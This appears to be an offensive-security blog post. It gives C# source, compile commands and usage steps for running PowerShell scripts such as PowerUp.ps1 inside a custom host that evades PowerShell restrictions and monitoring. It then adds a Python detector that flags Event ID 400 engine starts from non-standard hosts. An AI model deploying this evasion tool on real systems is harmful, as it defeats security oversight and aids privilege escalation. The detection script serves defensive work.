PowerShell w/o PowerShell Simplified
In a previous post, titled PowerShell without PowerShell, we showed how to bypass Application Whitelisting Software (AWS), PowerShell restrictions/monitoring, and Command Prompt restrictions. In some cases you might not need all of that; you might just need a way to bypass PowerShell restrictions and/or monitoring. This post presents a simple solution for that scenario. The approach is not new, but this post attempts to present it in a plain, straightforward way.
The sections are as follows:
Code: The code needed for this solution
Compilation: The OS-Dependent commands to compile the code
Usage: Instructions on compilation, special configuration of PowerShell files, and execution of the program and PowerShell scripts.
Code (prog.cs):
//Usage: prog.exe "path_to_powershell_file"
using System;
using System.Management.Automation.Runspaces;

public class Program
{
    public static void Main(string[] args)
    {
        Mycode.Exec(args[0]);
    }
}

public class Mycode
{
    public static void Exec(string file)
    {
        // Read the whole script file into a string
        string command = System.IO.File.ReadAllText(file);

        // Host the PowerShell engine in this process: no powershell.exe is started
        RunspaceConfiguration rspacecfg = RunspaceConfiguration.Create();
        Runspace rspace = RunspaceFactory.CreateRunspace(rspacecfg);
        rspace.Open();

        // Run the script text as a single pipeline inside that runspace
        Pipeline pipeline = rspace.CreatePipeline();
        pipeline.Commands.AddScript(command);
        pipeline.Invoke();

        rspace.Close();
    }
}
Compilation:
Windows 7 x64
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Windows 7 x86
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Windows 10 x64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Windows 10 x86
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll /unsafe /platform:anycpu /out:C:\Users\Public\prog.exe C:\Users\Public\prog.cs
Usage:
Create a file named C:\Users\Public\prog.cs. Copy and paste the code from the Code section above into the prog.cs file.
Open a Windows Command Prompt and compile the program by copying and pasting the command above that is appropriate to your OS.
In the PowerShell script that you wish to run, place the function call that you would normally use to run the script at the bottom of the script. For instance, say that you wanted to run Invoke-AllChecks from PowerUp.ps1. I typically do the following:
Invoke-AllChecks -Verbose | Out-File C:\Users\Public\allchecks.txt
To do the same with this program, you would need to copy the command above and paste it at the bottom of the PowerUp.ps1 file.
Once you’ve placed your function call at the bottom of your target PowerShell script, run the program and script with the following command from the Windows Command Prompt:
C:\Users\Public\prog.exe C:\Users\Public\PowerUp.ps1
Note that you need to change C:\Users\Public\PowerUp.ps1 to be the name of the PowerShell script that you would like to run.
Conclusion:
This short and (hopefully) simple post presented a quick solution for executing PowerShell scripts in environments where PowerShell usage is restricted and/or monitored. It is one more reason for organizations to consider enforcing stricter AWS policies in their environment.
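Because the script above runs inside a custom host process, controls that key on powershell.exe never see it. The PowerShell engine itself, however, still writes its engine-start event (Event ID 400, "Engine state is changed from None to Available", in the classic Windows PowerShell log), and the HostApplication field of that event records the command line of whatever executable loaded the engine. The following script, added here as a defender-side example and not part of the original post, parses constructed sample Event 400 messages and flags engine starts whose host executable is not one of the expected PowerShell hosts. The allowlist of host executables and the sample values (versions, sequence numbers, the prog.exe path taken from this post) are assumptions to adjust for your environment.

```python
"""Flag PowerShell engine starts (Event ID 400, classic "Windows PowerShell" log)
whose HostApplication is not one of the expected PowerShell host executables."""
import ntpath
import re
from typing import Dict, List

# Host executables that normally start the PowerShell engine. Anything else
# (a custom host that loads System.Management.Automation directly, like the
# prog.exe in this post) deserves a closer look. Assumed allowlist; adjust it.
EXPECTED_HOSTS = {"powershell.exe", "powershell_ise.exe", "pwsh.exe", "wsmprovhost.exe"}

# Constructed sample messages, trimmed to the "Details:" lines this check uses.
# Versions, sequence numbers and the ISE command line are made up for the example.
SAMPLE_EVENTS: List[str] = [
    "Engine state is changed from None to Available.\n\n"
    "Details:\n"
    "\tNewEngineState=Available\n"
    "\tPreviousEngineState=None\n\n"
    "\tSequenceNumber=13\n\n"
    "\tHostName=ConsoleHost\n"
    "\tHostVersion=5.1.19041.1\n"
    "\tHostApplication=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile\n"
    "\tEngineVersion=5.1.19041.1\n",
    # A custom host: the hosting executable shows up in HostApplication instead of powershell.exe.
    "Engine state is changed from None to Available.\n\n"
    "Details:\n"
    "\tNewEngineState=Available\n"
    "\tPreviousEngineState=None\n\n"
    "\tSequenceNumber=9\n\n"
    "\tHostName=Default Host\n"
    "\tHostVersion=2.0\n"
    "\tHostApplication=C:\\Users\\Public\\prog.exe C:\\Users\\Public\\PowerUp.ps1\n"
    "\tEngineVersion=2.0\n",
    # Quoted path plus arguments with spaces, to exercise the executable extraction.
    "Engine state is changed from None to Available.\n\n"
    "Details:\n"
    "\tHostName=Windows PowerShell ISE Host\n"
    "\tHostApplication=\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\""
    " -File \"C:\\Program Files\\Example\\audit.ps1\"\n",
]

# One "Key=Value" line of the Details block
_FIELD_RE = re.compile(r"^\s*(\w+)=(.*)$")
# First token of the command line up to and including ".exe", quoted or not
_EXE_RE = re.compile(r'^\s*"?(.*?\.exe)"?', re.IGNORECASE)


def parse_engine_event(message: str) -> Dict[str, str]:
    """Return the Key=Value pairs from the Details block of an Event 400 message."""
    fields: Dict[str, str] = {}
    for line in message.splitlines():
        m = _FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def host_executable(host_application: str) -> str:
    """Extract the lowercase executable file name from a HostApplication command line."""
    m = _EXE_RE.match(host_application)
    if not m:
        return ""
    return ntpath.basename(m.group(1)).lower()


def unexpected_hosts(messages: List[str]) -> List[Dict[str, str]]:
    """Return the parsed events whose host executable is not in EXPECTED_HOSTS."""
    hits: List[Dict[str, str]] = []
    for msg in messages:
        fields = parse_engine_event(msg)
        exe = host_executable(fields.get("HostApplication", ""))
        if exe not in EXPECTED_HOSTS:
            fields["HostExecutable"] = exe
            hits.append(fields)
    return hits


if __name__ == "__main__":
    for hit in unexpected_hosts(SAMPLE_EVENTS):
        print(f"[!] engine started by {hit['HostExecutable']}: {hit['HostApplication']}")
```

Run against real data, the message text would come from the Windows PowerShell log (for example the Message property of each Event ID 400 record exported to a file) rather than from SAMPLE_EVENTS; the parsing and the allowlist comparison stay the same. The check deliberately keys on the executable name inside HostApplication rather than on HostName, because the command line names the actual binary that hosted the engine.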